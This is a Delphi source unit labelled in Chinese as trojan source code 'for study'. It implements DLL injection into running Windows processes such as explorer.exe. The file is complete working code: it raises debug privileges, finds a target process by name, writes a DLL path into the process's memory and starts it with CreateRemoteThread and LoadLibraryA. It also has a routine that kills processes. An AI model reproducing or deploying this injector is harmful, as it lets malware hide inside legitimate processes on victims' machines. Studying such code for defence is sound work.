dllinject.pas

木马源程序,供大家研究

{
  DLLInject Unit One For 9x,nt,2k,xp,2k3 By Anskya
  Email:Anskya@Gmail.com
  Web:http://Www.Anskya.Net

  DLL进程插入单元 For Delphi
  可以在9x,Nt,2K,Xp,2K3下工作

  采用远程线程注入LoadLibraryA('xxx.dll');代码
  来进行DLL插入

example:
DNADLL('explorer.exe','c:\test.dll');
}

unit DLLInject;

interface

uses windows;

  function DNADLL(Name: string;DLLPath: PChar):Boolean;  //进程插入函数
  procedure killbyPID(PID: DWORD);                      //关闭进程
function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; dwFreeType: LongWord): Boolean; stdcall; external;
function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;

implementation
{$L EliRT_OMF_B.obj}
//function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
//function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; dwFreeType: LongWord): Boolean; stdcall; external;
//function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;

const
 TH32CS_SnapProcess = 2;

type
  TProcessEntry32 = record
    dwSize: DWORD;
    cntUsage: DWORD;
    th32ProcessID: DWORD;
    th32DefaultHeapID: DWORD;
    th32ModuleID: DWORD;
    cntThreads: DWORD;
    th32ParentProcessID: DWORD;
    pcPriClassBase: integer;
    dwFlags: DWORD;
    szExeFile: array [0..MAX_PATH-1] of char;
  end;

procedure killbyPID(PID: DWORD);
var
  hp : THANDLE;
begin
  hp := OpenProcess(PROCESS_TERMINATE, False, PID);
  TerminateProcess(hp, 0);
end;

Const SE_DEBUG_NAME = 'SeDebugPrivilege' ;

procedure GetDebugPrivs;                    //提升进程权限
var
  hToken: THandle;
  tkp: TTokenPrivileges;
  retval: dword;
begin
  If (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then
  begin
    LookupPrivilegeValue(nil, SE_DEBUG_NAME  , tkp.Privileges[0].Luid);
    tkp.PrivilegeCount := 1;
    tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
  end;
end;

function LowerCase(const S: string): string;
var
  Ch: Char;
  L: Integer;
  Source, Dest: PChar;
begin
  L := Length(S);
  SetLength(Result, L);
  Source := Pointer(S);
  Dest := Pointer(Result);
  while L <> 0 do
  begin
    Ch := Source^;
    if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
    Dest^ := Ch;
    Inc(Source);
    Inc(Dest);
    Dec(L);
  end;
end;

function InjectLibrary(Process: LongWord; DLLPath: PChar): Boolean;
var
  Parameters: Pointer;
  BytesWritten, Thread, ThreadID: dword;
begin
  Result := False;
  Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
  if Parameters = nil then Exit;
  WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
  Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
  WaitForSingleObject(Thread, 3000);
  xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
  if Thread = 0 then Exit;
  CloseHandle(Thread);
  Result := True;
end;

var
  pCreateToolhelp32Snapshot : function (dwFlags, th32ProcessID: cardinal) : cardinal; stdcall = nil;
  pProcess32First :  function (hSnapshot: cardinal; var lppe: TProcessEntry32) : bool; stdcall = nil;
  pProcess32Next  :  function (hSnapshot: cardinal; var lppe: TProcessEntry32) : bool; stdcall = nil;

function TestToolhelpFunctions : boolean;
var c1 : cardinal;
begin
  c1:=GetModuleHandle('kernel32');
  @pCreateToolhelp32Snapshot:=GetProcAddress(c1,'CreateToolhelp32Snapshot');
  @pProcess32First:=GetProcAddress(c1,'Process32First');
  @pProcess32Next:=GetProcAddress(c1,'Process32Next');
  result := (@pCreateToolhelp32Snapshot<>nil) and (@pProcess32First<>nil) and (@pProcess32Next<>nil);
end;


function CreateToolhelp32Snapshot (dwFlags,th32ProcessID: cardinal) : cardinal;
begin
  result := 0;
  if @pCreateToolhelp32Snapshot = nil then if not TestToolhelpFunctions then exit;
  result := pCreateToolhelp32Snapshot( dwFlags , th32ProcessID );
end;

function Process32First(hSnapshot: cardinal; var lppe: TProcessEntry32) : bool;
begin
  result := false;
  if @pProcess32First = nil then if not TestToolhelpFunctions then exit;
  result := pProcess32First(hSnapshot,lppe);
end;

function Process32Next(hSnapshot: cardinal; var lppe: TProcessEntry32) : bool;
begin
   result := false;
   if @pProcess32Next = nil then if not TestToolhelpFunctions then exit;
   result := pProcess32Next(hSnapshot,lppe);
end;

function DNADLL(Name: string;DLLPath: PChar):Boolean;
var
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
  ProcessHandle:dword;
  ContinueLoop: BOOL;
begin
  Result := False;
  GetDebugPrivs;
  FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
  FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle,FProcessEntry32);
  Name:=LowerCase(Name);
  While ContinueLoop do
  begin
    If Name = LowerCase(FProcessEntry32.szExeFile) then
    begin
      ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
      if InjectLibrary(ProcessHandle, DLLPath) then Result := True;
      Break;
    end;
    ContinueLoop:=Process32Next(FSnapshotHandle,FProcessEntry32);
  end;
  CloseHandle(FSnapshotHandle);
end;

end.